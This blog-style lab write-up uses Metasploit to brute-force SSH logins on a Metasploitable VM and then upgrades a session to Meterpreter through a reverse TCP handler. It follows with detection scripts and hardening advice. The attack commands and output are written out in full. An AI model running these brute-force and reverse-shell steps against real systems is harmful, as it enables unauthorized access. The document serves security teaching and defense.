Cybersecurity Notes: Bits of Life and Work

Metasploit in Practice: SSH Vulnerability Attacks

2019-07-09  DreamsonMa

SSH weak-password cracking

If the administrator configured an easily guessed username and password (a weak password) when setting up the SSH service, a tester can use a password tool to brute-force that weak password. Once it is cracked, the username and password can be used to log in to the system.

Below, msfconsole is used to brute-force SSH weak passwords:

1. Start msfconsole

➜  ~ msfconsole 

2. Find the relevant module

msf5 > search -S auxiliary ssh

Matching Modules
================

   Name                                                        Disclosure Date  Rank       Check  Description
   ----                                                        ---------------  ----       -----  -----------
   auxiliary/dos/windows/ssh/sysax_sshd_kexchange              2013-03-17       normal     No     Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
   auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                                    normal     No     SSH Key Exchange Init Corruption
   auxiliary/fuzzers/ssh/ssh_version_15                                         normal     No     SSH 1.5 Version Fuzzer
   auxiliary/fuzzers/ssh/ssh_version_2                                          normal     No     SSH 2.0 Version Fuzzer
   auxiliary/fuzzers/ssh/ssh_version_corrupt                                    normal     No     SSH Version Corruption
   auxiliary/scanner/http/cisco_firepower_login                                 normal     Yes    Cisco Firepower Management Console 6.0 Login
   auxiliary/scanner/http/gitlab_user_enum                     2014-11-21       normal     Yes    GitLab User Enumeration
   auxiliary/scanner/ssh/apache_karaf_command_execution        2016-02-09       normal     Yes    Apache Karaf Default Credentials Command Execution
   auxiliary/scanner/ssh/cerberus_sftp_enumusers               2014-05-27       normal     Yes    Cerberus FTP Server SFTP Username Enumeration
   auxiliary/scanner/ssh/detect_kippo                                           normal     Yes    Kippo SSH Honeypot Detector
   auxiliary/scanner/ssh/eaton_xpert_backdoor                  2018-07-18       normal     Yes    Eaton Xpert Meter SSH Private Key Exposure Scanner
   auxiliary/scanner/ssh/fortinet_backdoor                     2016-01-09       normal     Yes    Fortinet SSH Backdoor Scanner
   auxiliary/scanner/ssh/juniper_backdoor                      2015-12-20       normal     Yes    Juniper SSH Backdoor Scanner
   auxiliary/scanner/ssh/karaf_login                                            normal     Yes    Apache Karaf Login Utility
   auxiliary/scanner/ssh/libssh_auth_bypass                    2018-10-16       normal     Yes    libssh Authentication Bypass Scanner
   auxiliary/scanner/ssh/ssh_enumusers                                          normal     Yes    SSH Username Enumeration
   auxiliary/scanner/ssh/ssh_identify_pubkeys                                   normal     Yes    SSH Public Key Acceptance Scanner
   auxiliary/scanner/ssh/ssh_login                                              normal     Yes    SSH Login Check Scanner
   auxiliary/scanner/ssh/ssh_login_pubkey                                       normal     Yes    SSH Public Key Login Scanner
   auxiliary/scanner/ssh/ssh_version                                            normal     Yes    SSH Version Scanner

3. Select the module and set its options:

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
USERPASS_FILE => /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                                         Required  Description
   ----              ---------------                                         --------  -----------
   BLANK_PASSWORDS   false                                                   no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                       yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                   no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                   no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                   no        Add all users in the current database to the list
   PASSWORD                                                                  no        A specific password to authenticate with
   PASS_FILE                                                                 no        File containing passwords, one per line
   RHOSTS            10.0.2.5                                                yes       The target address range or CIDR identifier
   RPORT             22                                                      yes       The target port
   STOP_ON_SUCCESS   false                                                   yes       Stop guessing when a credential works for a host
   THREADS           1                                                       yes       The number of concurrent threads
   USERNAME                                                                  no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/wordlists/metasploit/piata_ssh_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                   no        Try the username as the password for all users
   USER_FILE                                                                 no        File containing usernames, one per line
   VERBOSE           false                                                   yes       Whether to print output for all attempts

4. Run the brute-force

msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 10.0.2.5:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.2.12:42799 -> 10.0.2.5:22) at 2019-07-09 10:05:04 -0400
[+] 10.0.2.5:22 - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (10.0.2.12:41479 -> 10.0.2.5:22) at 2019-07-09 10:07:31 -0400
[+] 10.0.2.5:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (10.0.2.12:37033 -> 10.0.2.5:22) at 2019-07-09 10:32:43 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
msf5 auxiliary(scanner/ssh/ssh_login) > pwd
[*] exec: pwd

/root
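The run above yielded three successful logins from 10.0.2.12 within about half an hour, and every guess that preceded them lands in the target's sshd log as a `Failed password` line. (The `id` and `pwd` typed at the msf5 prompt above went through msfconsole's local `exec`, which is why they report root in /root on the attacking machine; the sessions themselves are driven with `sessions -i`.) The shell snippet below is an added example, not code from the original post: it scans constructed auth.log lines for sources with repeated failures and then flags any such source that also logged in successfully. The log lines, hostname and addresses are made-up samples, and the functions read an embedded string rather than /var/log/auth.log.

```shell
#!/bin/sh
# Detection example (added here, not part of the original post): flag source
# addresses that produce many failed SSH logins, the footprint a password
# brute-force leaves in the target's auth log. Log lines below are constructed.

SAMPLE_AUTH_LOG='Jul  9 10:04:51 metasploitable sshd[4120]: Failed password for invalid user admin from 10.0.2.12 port 42790 ssh2
Jul  9 10:04:52 metasploitable sshd[4122]: Failed password for invalid user test from 10.0.2.12 port 42791 ssh2
Jul  9 10:04:53 metasploitable sshd[4124]: Failed password for root from 10.0.2.12 port 42792 ssh2
Jul  9 10:04:55 metasploitable sshd[4126]: Failed password for user from 10.0.2.12 port 42793 ssh2
Jul  9 10:05:04 metasploitable sshd[4128]: Accepted password for user from 10.0.2.12 port 42799 ssh2
Jul  9 10:20:11 metasploitable sshd[4300]: Failed password for msfadmin from 10.0.2.7 port 51002 ssh2
Jul  9 10:21:40 metasploitable sshd[4302]: Accepted publickey for msfadmin from 10.0.2.7 port 51003 ssh2'

# Print "count ip" for every source with at least $1 failed password
# attempts (default 3), highest count first.
ssh_bruteforce_sources() {
    threshold=${1:-3}
    printf '%s\n' "$SAMPLE_AUTH_LOG" | awk -v t="$threshold" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # The source address is always the field after the word "from".
            for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i+1)]++
        }
        END { for (ip in fails) if (fails[ip] >= t) printf "%d %s\n", fails[ip], ip }
    ' | sort -rn
}

# Print the flagged sources that also logged in successfully with a password:
# a success right after a failure burst is the signal worth paging on.
ssh_success_after_bruteforce() {
    ssh_bruteforce_sources "${1:-3}" | while read -r count ip; do
        if printf '%s\n' "$SAMPLE_AUTH_LOG" | grep -q "Accepted password for .* from $ip "; then
            printf '%s\n' "$ip"
        fi
    done
    return 0
}

# Stand-alone demo: sources with >= 3 failures, then those that got in.
ssh_bruteforce_sources 3
ssh_success_after_bruteforce 3
```

On a real host, swap the `printf '%s\n' "$SAMPLE_AUTH_LOG"` feeds for `cat /var/log/auth.log`; the `--hitcount`-style threshold is the same idea the iptables rules at the end of this post apply at the network layer.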

Inject a payload to get a Meterpreter shell

1. Switch to a logged-in user

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l

Active sessions
===============

  Id  Name  Type         Information                          Connection
  --  ----  ----         -----------                          ----------
  2         shell linux  SSH postgres:postgres (10.0.2.5:22)  10.0.2.12:41479 -> 10.0.2.5:22 (10.0.2.5)
  3         shell linux  SSH msfadmin:msfadmin (10.0.2.5:22)  10.0.2.12:37033 -> 10.0.2.5:22 (10.0.2.5)

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

whoami
user

2. Get a Meterpreter shell

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]

[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.0.2.12:4433 
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 4 opened (10.0.2.12:4433 -> 10.0.2.5:37897) at 2019-07-09 11:25:08 -0400
[*] Command stager progress: 100.00% (773/773 bytes)

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                            Connection
  --  ----  ----                   -----------                                                            ----------
  2         shell linux            SSH postgres:postgres (10.0.2.5:22)                                    10.0.2.12:41479 -> 10.0.2.5:22 (10.0.2.5)
  4         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ metasploitable.localdomain  10.0.2.12:4433 -> 10.0.2.5:37897 (10.0.2.5)

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Guide to defending against SSH attacks

  1. SSH: change the default port

By default SSH listens on port 22. For security, the default port is usually changed, and the SSH service must be restarted after the change.

(Figure: changing the SSH default port)

  2. SSH: set up PGP (key-pair) login

By default SSH logs users in remotely with a username and password, but it can also authenticate with a key pair (a public key and a private key).

Generate the SSH key pair with puttygen. Download link: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

(Figure: generating an SSH key pair)

On Linux, run the ssh-keygen command to create the .ssh directory, create the key store file authorized_keys under .ssh, and copy the private key file into the .ssh directory. Run puttygen -L "copied private key file" and paste its output into the authorized_keys file.

(Figure: running ssh-keygen on Linux to create .ssh; running puttygen -L)

Connect with the PuTTY client with the private key file loaded.

(Figure: connecting from the PuTTY client with the private key file loaded)

  3. SSH: defend user accounts against brute force

On Linux, SSH can be configured to refuse username/password login and accept only SSH PGP (key) authentication, which sidesteps SSH brute forcing. The drawback is that, without password login, many routine operations become considerably more cumbersome.

(Figure: defending user accounts against SSH brute force)

  4. Set an iptables threshold to stop brute forcing

Use iptables to lock out a source for 120 seconds after repeated failed connection attempts. After adding the rules, restart the ssh service.
iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent  --update --seconds 120 --hitcount 3 -j DROP
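The four items above come down to a few sshd_config settings plus file permissions, and both are easy to get subtly wrong: sshd uses only the first occurrence of a keyword, matches keywords case-insensitively, and with the default `StrictModes yes` silently rejects a key when `~/.ssh` or `authorized_keys` is group- or world-writable. Note also that `puttygen -L` prints the public half of a .ppk key in OpenSSH format, so only that line has to reach authorized_keys; the private key itself does not need to be copied to the server. The script below is an added example, not part of the original post: it audits a constructed weak and a constructed hardened configuration for the port, password and public-key settings and checks the key-file permissions. The config texts and the temporary home directory are samples, not files from the author's system, and the iptables rules above are outside its scope.

```shell
#!/bin/sh
# Audit example (added here, not part of the original post). Checks an
# sshd_config text for the settings the hardening list above relies on, and
# checks that the key files sshd will read are not writable by other users.
# All inputs are constructed samples; a real audit reads /etc/ssh/sshd_config.

WEAK_SSHD_CONFIG='# constructed sample: stock-looking sshd_config
Port 22
PubkeyAuthentication yes
PasswordAuthentication yes'

HARDENED_SSHD_CONFIG='# constructed sample: after the hardening steps
Port 2222
PubkeyAuthentication yes
passwordauthentication no
# the duplicate below is ignored by sshd: only the first occurrence counts
PasswordAuthentication yes'

# Value of keyword $2 in config text $1, or default $3 when absent. Mirrors
# sshd parsing: comment and blank lines are skipped, the keyword match is
# case-insensitive, and the first occurrence wins.
sshd_setting() {
    printf '%s\n' "$1" | awk -v key="$2" -v def="$3" '
        /^[[:space:]]*#/ || NF == 0 { next }
        tolower($1) == tolower(key) { print $2; found = 1; exit }
        END { if (!found) print def }
    '
}

# One finding per line; prints nothing when all three settings are in order.
# The defaults passed in are the OpenSSH defaults for a missing keyword.
audit_sshd_config() {
    cfg=$1
    port=$(sshd_setting "$cfg" Port 22)
    pw=$(sshd_setting "$cfg" PasswordAuthentication yes)
    pk=$(sshd_setting "$cfg" PubkeyAuthentication yes)
    [ "$port" != "22" ] || echo "Port 22: still on the default port"
    [ "$pw" != "yes" ]  || echo "PasswordAuthentication yes: password guessing stays possible"
    [ "$pk" = "yes" ]   || echo "PubkeyAuthentication $pk: key login is switched off"
    return 0
}

# sshd (StrictModes yes, the default) refuses keys when ~/.ssh or
# authorized_keys is group- or world-writable. $1 = home directory.
# Prints the offending paths, nothing when the permissions are fine.
authorized_keys_writable_by_others() {
    for p in "$1/.ssh" "$1/.ssh/authorized_keys"; do
        [ -e "$p" ] && find "$p" -prune \( -perm -g+w -o -perm -o+w \)
    done
    return 0
}

# Stand-alone demo against the two samples plus a throwaway home directory.
echo "== weak config =="
audit_sshd_config "$WEAK_SSHD_CONFIG"
echo "== hardened config (expect no findings) =="
audit_sshd_config "$HARDENED_SSHD_CONFIG"
demo_home=$(mktemp -d)
mkdir -m 700 "$demo_home/.ssh"
touch "$demo_home/.ssh/authorized_keys"
chmod 644 "$demo_home/.ssh/authorized_keys"   # readable by others is fine, writable is not
echo "== writable key files (expect none) =="
authorized_keys_writable_by_others "$demo_home"
rm -rf "$demo_home"
```

Run the audit against `"$(cat /etc/ssh/sshd_config)"` and the permission check against each home directory that should accept key logins; fix findings, then restart sshd while keeping one working session open so a mistake in the new config cannot lock you out.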
